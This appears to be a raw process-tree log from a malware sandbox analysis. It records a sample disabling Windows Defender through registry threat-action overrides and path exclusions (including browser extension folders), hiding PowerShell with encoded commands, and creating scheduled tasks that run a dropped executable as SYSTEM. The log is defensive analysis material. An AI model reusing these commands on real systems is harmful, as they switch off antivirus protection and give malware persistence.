\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ghtgCwFBD" /SC once /ST 02:01:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ghtgCwFBD"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ghtgCwFBD"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 03:46:49 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\gfswPFz.exe\" aV /DMSkdidQv 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "yfARWRprRqUFWeTGf"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5876 -ip 58761⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\gfswPFz.exeC:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\gfswPFz.exe aV /DMSkdidQv 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
